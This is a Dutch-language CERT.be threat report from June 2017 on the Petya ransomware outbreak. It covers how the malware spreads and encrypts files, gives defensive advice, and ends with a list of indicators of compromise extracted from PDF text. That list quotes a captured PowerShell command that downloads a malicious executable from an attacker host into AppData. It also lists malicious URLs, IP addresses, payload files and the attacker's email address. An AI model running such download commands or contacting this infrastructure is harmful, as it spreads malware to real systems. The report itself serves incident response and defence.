Petya ransomware aanval Intieel Rapport TLP: [WHITE]
Inhoud 1 Samenvatting... 3 2 Advies... 4 3 IOC s... 5 Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 2
1 SAMENVATTING DREIGING SLACHTOFFERS DADERS HOOG wereldwijd bedrijven + onbekend individuen CERT.be ontving informatie via betrouwbare partners dat de Oekraïnische overheid, Russische bedrijven en een containerterminal bedrijf uit Denemarken onder aanval lagen van een nieuwe ransomware aanval. Kort nadien werd de slachtofferlijst aangevuld met bedrijven uit Nederland, Spanje, Frankrijk, Groot-Britanië en België. Het lijkt te gaan over een nieuwe variant van de Petya ransomware die zich (intern) lijkt te verspreiden via de EternalBlue/DoublePulsar exploit 1 voor SMB die vorige maand furore maakte via de ransomware Wannacry. Eenmaal het systeem geïnfecteerd is, verspreidt de ransomware zich verder via een interne Windows toolkit (WMIC) en via een externe beheertool PsExec. De initiële aanvalvector is momenteel onbekend, maar het wordt geopperd dat het zich zou verspreiden via een excel document met een valse Windows signature 2 (LokiBot 3 ). Eenmaal het systeem geïnfecteerd is met de ransomware, probeert het de harde schijf te encrypteren door gebruik te maken van beheerdersrechten. Indien deze niet voorhanden zijn, gebruikt het een kernel exploit, injecteert het zichtzelf in de MBR 4 van de harde schijf en maakt het een scheduled task aan die een herstart uitvoert na één uur. Bij het heropstarten van het systeem laadt de ransomware zich in het geheugen en begint de encryptie. Er is geen killswitch aanwezig en de ransomware communiceert niet met C2 servers 5. Volgende extensies worden geëncrypteerd: ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd. kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.v di.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip" Na de encryptie krijgt de gebruiker een scherm te zien met volgende boodschap: Huidige informatie wijst erop dat systemen die gepatcht zijn met de wanacry-patch, toch kwetsbaar zijn voor deze ransomware. Momenteel hebben we weet van infecties op Windows XP, 7 en 10 van verschillende patchniveaus. 1 https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb 2 https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745// 3 https://gist.github.com/vulnerscom/65fe44d27d29d7a5de4c176baba45759 4 https://securelist.com/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/77762/ 5 https://twitter.com/gossithedog/status/879734018039836672 Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 3
2 ADVIES Niet betalen! Het emailadres is niet langer actief; Patch systemen (in het bijzonder MS17-010); Voorkom Local Administrator rechten voor gewone gebruiker; Zoek naar volgende scheduled task en verwijder: o C:\Windows\system32\shutdown.exe /r /f Houd AV/IDS/IPS up-to-date; Voorzie een Backup strategie; Traditionele beschermingsstrategiën tegen Ransomware 6 6 http://www.ccb.belgium.be/sites/default/files/ransomware%20v3.1.pdf Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 4
3 IOC S Category Type Value url http://185.165.29.78/~alex/svchost.exe External link https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e 0d229928963b30f6b0d7d3a745// md5 415fe69bf32634ca98fa07633f4118e1 External url https://www.hybrid.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d2299 28963b30f6b0d7d3a745?environmentId=100 Order-20062017.doc External url https://twitter.com/polartoffee/status/879709615675641856 fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d 206 External vulnerability CVE-2017-0199 sha1 101cc1cb56c407d5b9149f2c3b8523350d23ba84 url https://yadi.sk/d/s0-zhpy53kwc84 url https://yadi.sk/d/zpkm88sp3kwc8v sha1 736752744122a0b5ee4b95ddad634dd225dc0f73 md5 0487382a4daf8eb9660f1c67e30f8b25 Network ip-dst 84.200.16.242 mshta.exe ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63 bc6 myguy.xls Network url h11p://84.200.16.242/myguy.xls Network ip-dst 111.90.139.247 PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) 10807.exe %APPDATA%\10807.exe %APPDATA%\10807.exe' md5 a1d5895f85751dfe67d19cccb51b051a Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 5
Network External Analysis domain coffeinoffice.xyz PID: 3096)File Name BCA9D6.exeMD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051ASHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB301 7AF1FBDFile Size 275968 bytesconnects to the host:111.90.139.247 80 COFFEINOFFICE.XYZ 80Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part %APPDATA%\10807.exe sha1 url Sha1 Filepath Email powershell.exe 9288fb8e96d419586fc8c595dd95353d48e8a060 System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe 10807.exe %WINDIR%\System32\mshta.exe C:\myguy.xls.hta BCA9D6.exe 17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1f bd https://gist.github.com/vulnerscom/65fe44d27d29d7a5de4c176baba457 59 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a7 45 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94 b1 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f95222634b362 ca5 dllhost.dat wowsmith123456@posteo.net Petya ransomware aanval - 27 June 2017 - TLP: [WHITE] 6